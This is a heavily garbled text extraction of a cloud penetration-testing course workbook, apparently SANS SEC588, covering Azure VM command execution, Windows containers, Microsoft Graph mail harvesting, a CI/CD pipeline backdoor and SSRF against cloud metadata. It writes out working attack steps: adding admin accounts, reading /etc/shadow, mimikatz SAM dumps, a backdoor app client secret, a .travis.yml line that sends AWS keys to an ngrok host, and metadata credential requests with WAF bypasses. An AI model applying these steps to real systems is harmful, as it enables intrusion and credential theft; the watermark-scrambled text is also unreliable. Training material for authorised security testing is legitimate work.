--script ' ' : Anything that follows --script runs in powershell.

ljo
Gregg Harris
au
Executing this command takes a few minutes, the output is returned in JSON:
<p
s
rri
Ha
gg
re
: G
To
d
se
We can see that the command executes from a speci c directory.

n
C:\\Packages\\Plugins\\Microsoft.CPlat.Core.RunCommandWindows\\1.1.3\\Downloads
ce
Li
live
Are we running these commands in an elevated way? Remember you want to change your studentX account to
your student number.
az vm run-command invoke --command-id RunPowerShellScript --name dc1 -g <class-subdomain>-

resources --script 'net.exe user studentX Passw0rd123 /add'

The azure vm run-command will also take a while, but it should be successful, as shown below:
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
Using the Azure Portal to use the Custom Script Extensions
28
ly
Custom script extensions can are from the command prompt, but the experience is very cumbersome. You have
Ju
to create a speci c <xml> le that has a particular format.
>
om
_c
Note in the latest Azure portal this has slightly changed, so the Windows CLI is a bit simpler
ok
Let's try and use the Jerry 23169600 ou
tlo
account to perform these actions through the Azure portal.
@
66
Log in to Azure Portal, open Firefox by clicking on the Desktop:

s1
ne
ljo
Gregg Harris
au

om
Once you get to the Virtual Machine area, look at the di erent machines. Let's explore dc1 by clicking
_c
it. In the settings area choose Extensions .
ok
23169600
There is an existing script extension called
tlo
create-active-directory-forest . This particular scrpt will
ou
setup Active Directory, it uses the PowerShell custom module. You can click on it and see the results but you
@
cannot actually add another PowerShell extension. Only one module can be attached to a machine. You could
66
uninstall the module, but we may break our lab, so let's not do this.
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
:G
To
Running our own custom extensions

d
n se
Navigate back to the computers list. From here, choose your computer, the one you called studentX-Hack .
ce
This computer was created in Lab 3.3 Once you have this computer clicked choose extensions.
Li
live

3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
ly
Ju
>
om
_c
ok
The next thing is to click
23169600 @
ou
tlo
Add . But what will we add? Since this is a Linux computer instance, we cannot run
66
PowerShell, but we can run bash. If the run-command runs as an elevated user in Windows, does this script run
s1
as root?
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
: G
To
d
n se
ce
Let's choose Custom Script for Linux . Let's click Create . The new Azure Portal has a new mechanism
Li
to create a Linux Script or any customer Script. This system uses the Azure File Storage Blob. Click Browse .
live

3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
ly
Ju
>
om
_c
We navigate to our Storage Container for this lab. The storage account name is:
ok
sec588sharedstorageacct 23169600 ou
@
tlo
66
Inside it contains a folder called scripts. Click that into that folder.
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
: G
To
This folder has a script called script.sh

d
n se
!Student-X (pics/lab3.5/lab3-5-vm-extensions-storage-directory.png)
ce
Li
Make sure you click the checkbox and click the word
live select .
This script contains the following lines:

#!/bin/bash
3e1e3b497543e6c11ac8e4188959c93e
cat /etc/shadow
20
Clicking the CustomScript button once done, you should see the output of the command.
, 20
28
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
This takes a few minutes to execute

ne
Notice that the return is in a JSON array.

ljo
Gregg Harris
au
<p
If you have extra time

s
rri
Load the StorageExplorer:

Ha
gg
/opt/StorageExplorer/StorageExplorer
re
G
Once it is loaded, you can navigate to the folder with these scripts:
:
To
d
sec588sharedstorageacct
n se
ce
You can upload your scripts to try di erent attacks.

Li
live

3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
ly
Ju
Conclusion
>
om
In this lab we have shown you how to execute several commands in Azure, the commands we executed did not
_c
seem to be very special. Over the next few days we will go through which methods of execution prove most
ok
bene cial. However at the momment the critical pieces where, in what context can we execute commands. Will
23169600 tlo
those commands execute as an elevated user, which potentially could be a backdoor in the future?
@
ou
66
s1
ne
We may nd that we have existing running resources in Azure that we cannot access or turn o . The Azure VM is
running and rebooting it or snapshotting it may not yeild us options. How can we execute commands? We have
ljo
Gregg Harris
shown you two ways to execute backdoors with a live running system. These backdoors could be Download a
au
execute a backdoor through powershell or something else. We will provide you additional examples in upcoming
<p
sections.
s
rri
Ha
gg
re
SANS SEC560: Network Penetration Testing and Ethical Hacking (https://www.sans.org/sec560)
:G
To
d
se
n
ce
Li
live

Lab 3.6 Windows
3e1e3b497543e6c11ac8e4188959c93e
Containers
20
Brief Intro
, 20
28
One of the newest technologies that you will encounter in the cloud are containers. Windows Containers are very
ly
di erent from Linux containers. While some of the container technology was purposed built for hosting, the
Ju
Windows Kernel is still being expanded to support containers better. The typical throught process for securing a
>
container is not to run antivirus on the container host within the container but to run it while its stored in a
om
Container Registry or before it gets pushed into a host. This means if we can get a machine to execute one of
_c
our containers we may nd that the container can your any number of items in your environment that may be
ok
unexpected.
23169600
@
ou
tlo
66
s1

ne
ljo
Gregg Harris
au
<p
Try It Yourself
s
rri
Ha

gg
re
1. List out container registry items.
G
2. Create a container, see if you can access it on port 80.

:
To
3. Attach the container using the attach command.

4. Execute an evil attack, something obvious, standard mimikatz . There is a limitation in the shell.. maybe
d
se
use .log?
n
5. Check out the lesystem speci cally

ce
C:\\var
Li
Walkthrough live
Let's open the MATE terminal so that we can launch the Azure CLI

3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne

ljo
Gregg Harris
au
Now there are a couple of caveats that Microsoft has outlined in this:
<p
s
rri
Restrictions
Ha
gg
Azure Container Instances currently supports launching a single process with az container exec, and you cannot
re
pass command arguments. For example, you cannot chain commands like in sh -c "echo FOO && echo BAR", or
G
execute echo FOO.

:
To
d
se
Execute a command in a running Azure container instance (http://bit.ly/2tVpKXj)

n
ce
Li
live
This means that we can run powershell.exe or cmd.exe but we cannot run: "cmd.exe /c dir".

We can however attempt to try and work around this, after all we are hacking are we not? Let's explore the azure
login options:
3e1e3b497543e6c11ac8e4188959c93e
Let's open the MATE terminal so that we can launch az:
20
,20
28
ly
Ju
>
om
_c
ok
23169600 ou
@
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha

gg
re
Validate that you are logged in as Jerry:

: G
To
$ az account show
d
n se
If you are not, use the previous exercises to login as jerry

ce
Li
live
If we want to use a private Azure Container Registry we can, rst we need the name of the container registry:
az acr list -o table
From here we can login:

az acr login --name sec588class
You can use the username jerry@sec588.com by now you should have the password.
3e1e3b497543e6c11ac8e4188959c93e
To list the containers in the registry:
az acr repository list --name sec588class
20
, 20
28
ly
Ju
>
om
_c
We are not going to use the internal container registry, but why? The internal container registry will require a
ok
large number of items to have checked o :
23169600 ou
tlo
Azure KeyVault, Azure SAS Tokens, and other authentication information to get the Container Infrastructure to
@
authenticate to the registry and deploy an image.

66
s1
ne
Our image isn't all that special, so let's do something else, let's pull the same container from the o cial public
ljo
dockerhub registry:
Gregg Harris
au
<p
az container create --resource-group shared-resource-group --name studentX-container --image

s
mosesrenegade/microburst_dev --os Windows

rri
Ha
This command may take more than 5 minutes to run. Because Windows Containers are Massive!
gg
re
What is in microburst_dev? Let's discuss what we have done in this container, this container was built using a
G
speci c Dockerfile which we will show you below:

:
To
d
n se
ce
Li
live

FROM mcr.microsoft.com/windows/servercore:ltsc2019
LABEL maintainer="moses@moses.io"
3e1e3b497543e6c11ac8e4188959c93e
RUN mkdir C:\tools
RUN net user jerry redacted /add
COPY mimikatz C:/tools/
COPY microburst C:/tools/
RUN powershell -noP -sta "Invoke-WebRequest -Uri
20
https://aka.ms/installazurecliwindows -OutFile .\AzureCLI.msi; Start-Process msiexec
20
-Wait -ArgumentList '/I AzureCLI.msi /quiet'"
RUN powershell.exe -noP -sta "Invoke-PackageProvider -Name NuGet -MinimumVersion
,
28
2.8.5.201 -Force"
RUN powershell.exe -noP -sta "Install-Module -Name AzureRM -Scope CurrentUser -
ly
confirm"
Ju
RUN powershell -Command Add-WindowsFeature Web-Server; Invoke-WebRequest -
>
UseBasicParsing -Uri
om
"https://dotnetbinaries.blob.core.windows.net/servicemonitor/2.0.1.6/ServiceMonitor.exe"
_c
-OutFile "C:\ServiceMonitor.exe"
EXPOSE 80
ok
ENTRYPOINT ["C:\\ServiceMonitor.exe", "w3svc"]
23169600 @
ou
tlo
66
What does this container do? This container was an experiment by the author, could you push into a live
s1
container environment obviously malware and payloads. The answer is yes, but there are many caveats:
ne
ljo
1. The command execution environment wraps in a very strange way which will not yield for a perfectly runnign
Gregg Harris
au
shell
<p
2. There are issues executing certain commands from outside of items like powershell.
s
rri
Ha
What the author recommends is to copy a backdoor binary like a metasploit payload to connect back to you.
Once the container is in place let's execute a few jobs:
gg
re
G
$ az container exec --exec-command "powershell.exe" --name studentX-container --resource-group

:
shared-resource-group
To
d
se
This container will now execute and attach a shell to you, a powershell runtime binary.
n
ce
If you overrun the shell by typing the following:

Li
C:\ PS> dir C:\\Windows

live
What you quickly nd out is that the shell is extremely limited and the wrapping of the shell is broken.
You can look around the system that is running kubernetes for example you can:

C:\ PS> dir C:\\var
This is where secrets may be stores, in which there is none.
3e1e3b497543e6c11ac8e4188959c93e
Some of the oddities of this shell? Meterpreter is caught when run in .exe, not caught when run in a di erent
language like powershell. Mimikatz is also not prevented, oddly enough.
20
, 20
You can attempt to run mimikatz to dumb out the contents of the shell like so:
28
ly
Ju
C:\ PS> cd tools\
>
om
This will BREAK in your shell you will not see more than 2 or 3 lines
_c
ok
C:\ PS> .\mimikatz.exe
This will enable the mimikatz.log

23169600 @
ou
tlo
66
s1
mimikatz # log
ne
ljo
Turn on Privilege Debug:
Gregg Harris
au
<p
mimikatz # privilege::debug
s
rri
Ha
mimikatz # lsadump::sam
gg
mimikatz # exit
re
: G
To
Please note you will now get th efollowing error: ERROR kull_m_registry_OpenAndQueryWithAlloc ;
d
kull_m_registry_RegOpenKeyEx KO
se
ERROR kuhl_m_lsadump_getUsersAndSamKey ; kull_m_registry_RegOpenKeyEx SAM Accounts (0x00000005) These

n
ce
errors are new the Azure Container environment and could indicate further hardening from Microsoft to prevent
Li
unauthorized LSASS reads in the container
At this point you may have a log le in

live
C:\\Tools\mimikatz.log You will need a way to obtain it maybe you
can ftp it out or use a di erent mechanism to get this log to you. Potentially you can service it up in the IIS server
running in the device, you may have to change the name from .log to .html to retrieve the le.

Conclusion
This lab is the beginning coursory tour of the az tool, the tool itself can be weilded for both positive system
administration butalso for our own use in a penetration test if we understand how to navigate the system. Just
3e1e3b497543e6c11ac8e4188959c93e
like with aws tool, the az tool is working at the control plane layer and could circumvent some of the
traditional controls we may have put into a system.
20
, 20
28
Over the next few labs, we will be using this tool to implement our actions, getting familiar with how to use the
tool for reconnaissance gathering, listing of permissions and more will be critical.
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
: G
To
d
n se
ce
Li
live

Lab 3.7: Microsoft Graph
3e1e3b497543e6c11ac8e4188959c93e
and Postman API
20
Brief Intro
, 20
28
Microsoft Graph is a new SDK and API that allows for a programmable way to access Microsoft Speci c
ly
Services.While Microsoft Graph has been around in some form for a while. It was never more important or
Ju
relevant than when the CEO of Microsoft has "deprioritized" Windows for Microsoft Graph Microsoft Graph
>
(http://bit.ly/2SDgAqO) .
om
_c
Microsoft Graph while powerful is not as simple as it may seem. Permissions for Microsoft Graph are critical
ok
and for full on Application. We will be playing around with understanding how these API keys can be built and
what can be done with it.
23169600 @
ou
tlo
What is more alarming is the amount of con dent, sensitive or otherwise information is still being
66
private
emailed as part of the Operational Processes of an organization. What we are going to do in this Lab is Data
s1
mine that information.

ne
ljo
Gregg Harris
au

<p
s

rri
Ha
A web browser
gg
Postman the API Browser.

re
G:
Try It Yourself
To
d
se

n
ce
Li
1. Login to the Azure Portal.
live
2. Find the Postman App Registration in Azure Active Directory
3. Using the Postman App, create a Client Secret using StudentX-Postman .
4. Con gure Postman to connect to Microsoft Graph and Query Summer's email.
5. Once you have Summer's email try and download the le in a sensitive email.

Walkthrough
Getting ready with Azure AD Roles

3e1e3b497543e6c11ac8e4188959c93e
We will rst beging by logging into the Azure Portal using Firefox which is found on the Desktop of the VM:
20
, 20
28
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
Navigate to https://portal.azure.com and login as jerry@sec588.com with his account. Once you you
s1
logged in we will Navigate to Azure Active Directory.

ne
ljo
Once you are at Azure Active Directory locate: App Registrations.
Gregg Harris
au
<p
Under the Column Display Name , click on the Postman-API name.

s
rri
Ha
gg
re
:G
To
d
nse
ce
Li
live
We have pre-built a Postman Application for you, consider that this could be an internal application, it could be
called anything. It could even be a Microsoft PowerBI or a Microsoft Graph Application in house. Either way you

as an attack have this access. How can you leverage it?
First let's note a few items in the main page, record the following:
3e1e3b497543e6c11ac8e4188959c93e
Application (client) Id
Directory (tenant) Id
20
20
Now let's click on API Permissions. Here we can see that this App has a few Elevated permissions:
,
28
ly
Files.Read : This is a User based Permission, applies to whoever owns this application, it will read the Files
Ju
for the user in OneDrive.
>
om
User.Read : This is a User based Permission, applies to whoever owns this application, it will read the user
_c
information.
ok
There are other permissions: 23169600 @
ou
tlo
66
Mail.Read.All : This is a Application based Permission, applies globally and will read ALL users mail.
s1
ne
Files.Read.All : This is a Application based Permission, applies globally and will read ALL users les in
ljo
OneDrive.
Gregg Harris
au
<p
Users.Read.All : This is a Application based Permission, applies globally and will read ALL the users in the
s
SEC588 Azure Active Directory Graph.

rri
Ha
gg
re
: G
To
d
nse
ce
Li
live
How can we backdoor this access and get access to the API? Let's add our own Client Secret to start, Navigate to
the Certificate & Secrets Menu . From within this menu Add a New Client Secret, for One Year and
Name it

StudentX-Postman
Copy the value. It will only be shown once .
3e1e3b497543e6c11ac8e4188959c93e
Armed with these values we can now con gure Postman.
Postman Con guration
20
,20
28
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
:G
To

d
n se
$ cd /opt/postman
ce
Li
$ ./Postman
live
We will need to download and install the collection. To do so visit this link:
Postman Microsoft Graph (http://bit.ly/2OFCYi9)

Copy the following URL's:
https://raw.githubusercontent.com/microsoftgraph/microsoftgraph-postman-
3e1e3b497543e6c11ac8e4188959c93e
collections/master/Microsoft%20Graph.postman_collection.json
(https://raw.githubusercontent.com/microsoftgraph/microsoftgraph-postman-
collections/master/Microsoft%20Graph.postman_collection.json)
20
https://raw.githubusercontent.com/microsoftgraph/microsoftgraph-postman-
20
collections/master/Microsoft%20Graph.postman_environment.json
(https://raw.githubusercontent.com/microsoftgraph/microsoftgraph-postman-
,
28
collections/master/Microsoft%20Graph.postman_environment.json)
ly
Ju
To import them use the Import function of Postman.
>
om
From here click 'Import' and enter the URL'
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au

om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
:G
To
d
nse
ce
Li
Environment to Microsoft Graph.

live In the Top Right Corner change the
Finally click on the eyeball to con gure the environment.
With the Eyeball Clicked you will see several values:

ClientId
ClientSecret
3e1e3b497543e6c11ac8e4188959c93e
TenantId
And there are two that you do not have, the rst one is AppAccessToken and the second is
20
UserAccessToken .
, 20
28
Let's ll these in as the CURRENT VALUE and make sure to hit ENTER after each value is put in.
ly
Ju
ClientId will be the value: Application (client) Id
>
om
TenantId will be the value: Directory (tenant) Id
_c
ok
The ClientSecret
in the these values.
will be the
23169600
one time token
@
ou
tlo
that you created as the Student1-Postman secret. Put
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
: G
To
d
n se
ce
Li
live
Let's create a new request, click the + to open a new tab and make a POST request to:
https://login.microsoftonline.com/{{TenantID}}/oauth2/v2.0/token

You will also need to make a few changes:
Click the Body button and choose:
3e1e3b497543e6c11ac8e4188959c93e
x-www-form-urlencoded
The URL Encoded area will need a few rows to be added These are case sEnSiTiVe
20
20
Key: grant_type Value: client_credentials
,
28
ly
Key: client_id Value: {{ClientID}}
Ju
>
Key: Value:
om
client_secret {{ClientSecret}}
_c
Key: Value:
ok
scope https://graph.microsoft.com/.default
Once you have done this click: SEND 23169600 @

ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
In the bottom of the response you should see a JSON array with the value:
:G
To
"access_token" and its value in the " copy the value without the " . This is your AppAccessToken .
d
n se
ce
Li
live

3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
ly
Ju
>
om
Using Graph to nd Emails.
_c
ok
You can play with any of the queries you want. The way you will run a query is to use one of the ones you have
23169600
Permission to that is either "Mail" or "Users". @
ou
tlo
For Mail, let's click Get a Users Messages . This will get all the messages of a speci c user.
66
s1
ne
ljo
Gregg Harris
au

om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
If you look at the URL it shows {{UserId}} . Clicking send now will give you an error because the
gg
{{UserId}} is blank. If we wish to use this click the Eyeball once again, and under Current Value , let's put in
re
summer@sec588.com .
: G
To
d
n se
ce
Li
live

Clicking send . We now see Mail for summer .
If you look at the JSON carefully let's take a look at some area:
3e1e3b497543e6c11ac8e4188959c93e
bodyPreview : Summer this is sensitive
webLink : The Weblink of the Message
20
20
sender : George Georgeson, a Global Admin.
,
28
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
Summer recieved some type of special le, and I would assume that this is potentailly useful for us to have.
<p
Since we have Summer's username and password we can login and retrieve this le. If not we would need to nd
s
a di erent way.
rri
Ha
Go to https://outlook.o ce365.com (https://outlook.o ce365.com) , if you are logged in as just switch

gg
jerry
users or login as summer .
re
:G
You can locate the email message now and even download the le which is an SSH key. Keep this key for a
To
future lab.
d
se
n
ce
Li
live

3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
ly
Ju
Conclusion
>
om
There are tools today like mailsniper that are designed to use the O ce365 API's to try and extract emails
_c
from the system. As the Microsoft Graph API and other similar API's are universally built at Microsoft we will
ok
need to keep an eye on the API's. There may not be a tool designed to harvest this information day one, but
23169600
ability to abuse these sources of information.
@
ou
tlo
understanding how the tool will work by using Developer Focused tools like Postman could help us expedite the
66

s1
ne
Microsoft Graph is a treasure trove of information. While you may not have direct access to all of the sources of
ljo
Gregg Harris
data directly, you could attempt to indirectly access the system by leverage the Microsoft Graph API in a pseudo
au
out of band way. It would be ideal if Administrators always look at where they have deployed keys and rotate
<p
them often.
s
rri
Ha
gg
re
:G
To
d
nse
ce
Li
live

Lab 4.1: Backdoors in CI/CD
3e1e3b497543e6c11ac8e4188959c93e
Pipelines
20
Brief Intro
, 20
28
The CI/CD Pipeline is a critical part of the software supply chain. CI is for Continious Integration and CD is for
ly
Continous Delivery. The word Continous is only possible through Automation. If you can poison or nd your
Ju
way into a CI/CD Pipeline you can start to very much harm a system and introduce many attack vectors. This lab
>
does not demonstrate a full payload attack because terms of service in the CI pipeine may be violated, however
om
we will demonstrate extraction of sensitive data supplied by the author.
_c
ok
23169600 @
ou
tlo
This lab will require you to have complete the Microsoft Graph Lab, you will also need the following items.
66
s1
ssh
ne
ngrok
ljo
A working
Gregg Harris
python environment
au
git
<p
An Internet Connection
s
rri
Ha
Try It Yourself
gg
re
To attempt this lab yourself you must do the following items:
:G
To
1. Obtain the keys that are downloaded as 'day4'

d
2. Use it to download the following repository: git clone https://www.github.com/mosesrenegade/sec588-

se
day4 in the workdir area.

n
ce
3. Create a branch with your student number

Li
4. Start an ngrok http session and a python listener

5. Commit your branch with the changes to the
live
.travis.yml le
6. Use the commit to extract the hiddden AWS keys that are located in the travis system.
Walkthrough

Moving SSH Keys Around
To get started with will begin by using the SSH key that we have found in our Email in Section 3.7. If you recall
you downloaded it as:
3e1e3b497543e6c11ac8e4188959c93e
day4
20
When we do this step our wiki-updater.sh will break you need to restore this script for it to continue to work.
, 20
28
This le should be located in /home/sec588/Downloads .
ly
Ju
>
Let's open the MATE terminal so that we can modify some settings
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
: G
To
d
n se
ce
Li
live
$ cp /home/sec588/Downloads/day4 /home/sec588/.ssh/day4
$ cd /home/sec588/.ssh/

First thing we need to is we need to make the ssh key usable by setting permissions
$ chmod 400 day4
3e1e3b497543e6c11ac8e4188959c93e
We also need to modify the con g le.
$ nano config
20
20
The le will ship like this:
,
28
ly
Ju
host github.com
>
om
Hostname github.com
IdentityFile ~/.ssh/sec588-wiki-vm-keys
_c
User git
ok
23169600 @
ou
tlo
Given that international keyboards do not necessarily support ~ let's do two things, remove the IdentityFile
66
that exist and add our new one.

s1
ne
ljo
Gregg Harris
au
host github.com
<p
Hostname github.com
#IdentityFile ~/.ssh/sec588-wiki-vm-keys
s
IdentityFile /home/sec588/.ssh/day4
rri
User git
Ha
gg
re
G
Remember CTRL+X will save the le in nano

:
To
d
se
Copying our Repository

n
ce
We can now use the SSH Con guration to push and pull items. While we could spend days or weeks guring out
Li
live
what this le does, we are going to shortcut this process by telling you that this key will allow you to deploy into a
speci c repository, so let's play with this. The rst thing we will do is pull the repository down:
$ git clone https://www.github.com/mosesrenegade/sec588-day4

$ cd sec588-day
This will allow you to clone down the repo for this lab. The next thing you will need to do is modify the git
3e1e3b497543e6c11ac8e4188959c93e
repository so that you can push changes:
$ git remote -v
20
, 20
28
ly
Ju
>
om
_c
ok
23169600 tlo
This will allow you to 'checkout the current setting'. Let's change it to SSH:
@
ou
$ git remote set-url origin git@github.com:mosesrenegade/sec588-day4
66
s1
Now we should see the changes by typing

ne
ljo
Gregg Harris
au
$ git remote -v
<p
s
rri
Ha
gg
re
: G
To
d
At this point we are ready to look at our les. Switch directory into the sec588-day4.
n se
ce
$ cd sec588-day4
Li
live
We have two les that could be useful. The rst one is 'Docker le', we could poison this le with a backdoor.
Instead what we will concentrate on is extracting inforrmation from the .travis.yml.
Below is a screenshot of the travis build:

3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
Wouldn't it be valuable to extract or other sensitive information. The could be used to

rri
AWS keys AWS keys

Ha
connect to a private repository or maybe more. Let's show you how to obtain it.
gg
Let's open the MATE terminal so that we can open ngrok

re
:G
To
d
nse
ce
Li
live

3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne

ljo
Gregg Harris
au

om
_c
ok
23169600 @
ou
tlo
66
s1
ne

ljo
Gregg Harris
au
<p

s
rri
Right now you should have three terminal windows:

Ha
gg
ngrok window
re
G
simplehttpserver window
:
To
d
se
day4 window
n
ce
These are the three windows that we will have are shown below.
Li
live

3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
ly
Ju
>
om
In the ngrok window you will see the following line:
_c
ok
Forwarding http://<randomurl> -> http://localhost:8888
23169600 ou
tlo
Record the random url, this is your internet address that will forward all tra c to your local computer.
@
66
Pushing a new Branch

s1
ne
The next thing we will do is 'checkout a new branch'

ljo
Gregg Harris
au
<p
$ git checkout -b studentX

s
rri
After we have a new branch, the next thing we will do is open .travis.yml le you can use nano or whatever
Ha
application you want to use to edit this le.

gg
re
$ nano .travis.yml
: G
To
Look at the travis le, speci cally right after the section that reads:
d
n se
ce
Li
after_success:
- docker --version
live
What we will do is modify it to read the following:

after_success:
3e1e3b497543e6c11ac8e4188959c93e
- echo $AWS_ACCESS_KEY_ID
- wget http://ngrok-randomurl/ècho $AWS_ACCESS_KEY_ID`
20
We can now commit or branch to the github repository which should start a build:
, 20
28
$ git add .
ly
Ju
You can put anything you want in the comment:
>
om
$ git commit -m 'Our Fun Commit'
_c
ok
$ git push origin studentX
23169600 @
ou
tlo
This will push our repository into github. It may take up to 5 minutes to create the build but what should occur is
66
a push into the URL that will read out an environment variable, in our case, AWS_ACCESS_KEY_ID .
s1
ne
ljo
Gregg Harris
au

om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
Conclusions
re
G
The ability for us to valiate and understand the changes that occur in the most sensitive parts of our
:
To
infrastructure environments will be pandemount to understanding what is occuring in the overall architecture.
d
Are defenders monitoring the most sensitive and critical les in their network? Is there something that they can
se
do to make the environment better? This includes modi cations to Docker les and .travis.yml les which are
n
ce
very sensitive les in an organization.

Li
live
Remember you will need to revert the con g le to update the wiki:
$ nano /home/sec588/.ssh/config

Please make it re ect the following:
3e1e3b497543e6c11ac8e4188959c93e
host github.com
Hostname github.com
#IdentityFile /home/sec588/.ssh/day4
20
User git
, 20
28
This will allow wiki-updater.sh to work.
ly
Ju
>
om
_c
ok
This is important as more repositories become breached, more environment libraries are being moved from
23169600
developers to hackers, and more keys are exposed. Demonstrating the true impact to an organization is critical
tlo
for us to understand how attackers are taking over infrastructures and abusing the trust they have placed in
many of their own deployment system.
@
ou
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
: G
To
d
n se
ce
Li
live

Lab 4.2: SSRF's Attack Lab
3e1e3b497543e6c11ac8e4188959c93e
Brief Intro
20
This lab showcases the impacts of SSRF, this particular bug allows us to gain access into an environment by
using the Web Application as a proxy to internal web applications. This would grant the user the capability of
20
moving around an environment in a predictable way. One of the more important components of this would be to
,
28
take this, add consistently ask for URL's in the applications to see if they exist. We can even inspect locally served
les if we know what they are or can guess them.
ly
Ju
>
Remember Micro Services and Cloud Native Applications use HTTP/HTTPS as an internal transport protocol for
om
many of its services. Using the SSRF we can even start to look for other endpoints if we know what they are.
_c
ok
We will also attempt to cause and error, the error output of our lab will show up what type of application this
really is.
23169600 ou
@
tlo
66
s1
ne

ljo
Gregg Harris
au
A working internet connection, and access to the VM Browser and access to cURL.
.sec588.net
n
ce
2. Do not use a Web Browser to view the /url.

Li
live
3. Find the URL that is located in the homepage that is '/url'
4. Look at the URL GET Request and attempt to execute a SSRF by:

a. Trigger an error by going here: https://localhost:8080 , do not use a webbrowser for this step. b.
Look at http://localhost:8080/static/ssrf.html le that is hosted on the server and is readable by
talking to the server and requesting it. c. Look at the local metadata service and provide us with the
hostname, public-hostname, security-groups, and IAM info d. Get the Metadata service token
3e1e3b497543e6c11ac8e4188959c93e
Walkthrough
20
Getting started
, 20
28
Most of the labs in the Cloud Native Day are based on MicroServices, our endpoint will be the following:
ly
Ju
http://invoice.<class-subdomain>.sec588.net
>
om
Open refox and let's take a look at this particular site.
_c
ok
This application is built of multiple containers and much like our picture, we will try and uncover the di erent
components. 23169600 @
ou
tlo
The rst thing that we will do in our application is look at the way that SSRF's are designed, on the web page you
66
will see a link to a /url. Click the link and it should take you to the following url:
s1
ne
DO NOT CLICK ON THIS LINK BELOW, it will be different for your class
ljo
Gregg Harris
au
If you use a web browser for the step below it will FAIL, as the way the SSRF triggers may or may
.sec588.net/url?url=http://localhost:8080/static/ssrf.html
Ha
gg
re
: G
To
d
nse
ce
Li
live
Let's trigger an error, for this step and this step only we will not browser
Open a MATE terminal and type the following in:

$curl -v http://invoice.<class-subdomain>.sec588.net/url?url=hrl?url=https://localhost:8080/
WHAT WE ARE DOING HERE IS WE ARE CREATING A VERY UNIQUE ITEM
3e1e3b497543e6c11ac8e4188959c93e
Also note if this hangs, CTRL-C and try again
The URL shows up with the following items: url?url=hrl?url=http://localhost:8080/ and what this tells
the library is that our URL is purposefully malformed but the trailing / allows the system to execute this.
20
, 20
28
ly
Ju
>
om
This will fail, but what is more interesting is that a DEBUG message appears
_c
ok
What we will see if output that looks like a stacktrace and debug line. Some of the words we will need to pay
attention to:
23169600 @
ou
tlo
requests.exceptions
66
s1
/usr/local/lib/python3.6/
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
: G
To
d
nse
ce
Li
All of these are indicators that we are running in a python based container. We may need this information later.
live
Let's see how this bug will impact us, rst we should note that many default webservers do not run on a 'root'
level port, or that is a port that is below 1024. We happen to see many servers running in ports like 8000,
8080,8443, etc. We are going to start by guessing that this environment could be 8080 as the python stack trace
showed it to be running ask. Flask is commonly run on port 8080. Let's look:

http://invoice.<class-subdomain>.sec588.net/url?url=http://localhost:8080/
This should push our own local webserver into our page. A page within our page, inception. Remember back to
3e1e3b497543e6c11ac8e4188959c93e
Day2 with our IAM and escalation examples, maybe this container is running a cloud provider, maybe within
EC2, or maybe within GCP. What we can start to understand is weather we have the capability to browser other
internal pages using this page as a le reader. We do not yet know what the actual pages are, for that we will
need a di erent bug. Let's however see if we can get, futher into the environment.
20
20
http://invoice.<class-subdomain>.sec588.net/url?url=http://169.254.169.254/latest/meta-data/
,
28
From this point you should be looking at a nice view for the meta-data API. Let's explore what we know about this
ly
host:
Ju
>
om
http://invoice.<class-subdomain>.sec588.net/url?url=http://169.254.169.254/latest/meta-
_c
data/hostname
ok
The hostname of this device is:
23169600 @
ou
tlo
ip-192-168-<XX-YYY>.us-east-X.compute.internal
66
s1
We can see this node is running in an ip range of 192.168.X.X in the us-east-1 datacenter. What else can we
ne
learn:
ljo
Gregg Harris
au
<p
data/public-hostname
s
rri
Ha
The public hostname is something like: ec2-X-Y-Z-A.us-east-X.compute.amazonaws.com

gg
re
We could also get an indiciation of the type of device by looking at security-group names and some other items:
:G
To
d
data/security-groups
se
n
ce
Li
live
data/iam/info
Each one of these queries have details about thet type of device, the words 'eks' or 'eksctl' may give us some
indication
Let's take a look at what other credentials we can get:

data/iam/security-credentials/
3e1e3b497543e6c11ac8e4188959c93e
This will display the name of role that we wish to query
data/iam/security-credentials/<rolename>
20
, 20
28
ly
Ju
>
om
_c
ok
If you have additional time
23169600 ou
tlo
Attempt to make these command execute through command line tools such as:
@
66
curl
s1
ne
Attempt a WAF bypass by obfuscating some of the items:

ljo
Gregg Harris
au
Instead of localhost try: or Instead of just using try

<p
http://127.1:8080 http://0:8080/ /latest

adding self referencing urls: /./
s
rri
